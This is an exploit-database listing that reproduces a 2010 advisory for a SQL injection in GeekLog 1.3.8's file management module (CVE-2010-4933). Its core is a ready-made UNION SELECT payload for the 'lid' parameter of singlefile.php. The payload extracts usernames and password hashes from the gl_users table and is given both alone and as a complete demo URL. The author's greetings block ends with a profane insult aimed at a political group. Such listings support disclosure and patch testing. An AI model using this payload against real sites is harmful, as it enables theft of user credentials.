[] NeoSense
E X P L O I T S
title author type platform port cve id

GeekLog 1.3.8 (filemgmt) - SQL Injection

Author: Gamoscu
type: webapps
platform: php
port: 
date_added: 2010-09-23 
date_updated: 2015-07-12 
verified: 0 
codes: CVE-2010-4933;OSVDB-76222 
tags: 
aliases:  
screenshot_url:  
application_url: 
GeekLog v1.3.8  (filemgmt) SQL Injection Vulnerability

###########################

Author : Gamoscu

Homepage : http://www.1923turk.com

Blog :http://gamoscu.wordpress.com/

Script : http://www.geeklog.net/filemgmt/viewcat.php?cid=8

Download:http://www.geeklog.net/filemgmt/viewcat.php?cid=8

###########################

[ Vulnerable File ]

filemgmt/singlefile.php?lid=1 [ SQL ]

[ XpL ]

-1+union+all+select+1,2,concat_ws(username,0x3a,passwd),4,5,6,7,8,9,10,11,12,13,14,15,16+from+gl_users+limit+1,1--

[ Demo]

http://server/filemgmt/singlefile.php?lid=-1+union+all+select+1,2,concat_ws(username,0x3a,passwd),4,5,6,7,8,9,10,11,12,13,14,15,16+from+gl_users+limit+1,1--

##############################################################
#
#
#
# Baybora: http://baybora.wordpress.com/
#
# Manas58 – Delibey – Tiamo – Psiko – Turco – infazci – X-TRO
#
#
#
#            #Elektrikist#
#
#
#
#             FREEGAZA
#
#
#            PKK ALEM SIKSIN SIZI
#
#############################################
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.